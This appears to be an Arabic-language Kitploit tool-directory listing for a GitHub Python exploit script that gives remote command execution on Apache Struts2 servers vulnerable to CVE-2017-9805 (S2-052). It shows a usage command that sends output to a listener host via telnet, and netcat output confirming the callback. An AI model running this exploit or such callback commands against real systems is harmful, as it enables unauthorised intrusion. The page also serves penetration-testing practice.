Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-CVE-2017-9805 — نص استغلال لـ Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805) | Kitploit
أدوات/GitHubGitHub/0x00-0x00/-cve-2017-9805
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHub0x00-0x00/-cve-2017-9805

-CVE-2017-9805

نص استغلال لـ Apache Struts2 REST Plugin XStream RCE (‎CVE-2017-9805)

عرض المستودع
1513منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

معلومات الثغرة

المصادر: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805

ما هذا؟

نص برمجي بايثون لاستغلال الثغرات قادر على تنفيذ أوامر عن بعد في واجهة النظام الذي يستضيف Struts2 المعرض لـ S2-052.

الاستخدام

╭─root@blackshell ~/
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"

root@kitploit:~
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.

╭─zc00l@blackshell ~/
╰─$ nc -lvp 1234

root@kitploit:~
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned

تم اختباره على آلة pentesterlab المعرضة للخطر في التمرين s2-052.

حقوق المؤلف

تمت كتابة هذا النص البرمجي للاستغلال من قبلي (zc00l) ويمكن لأي شخص استخدامه.

في حال رغبت في استخدام أو تعديل هذا النص البرمجي، يرجى منح الإسناد المناسب لأي عمل تم إنجازه بالفعل.

تنزيل الأداة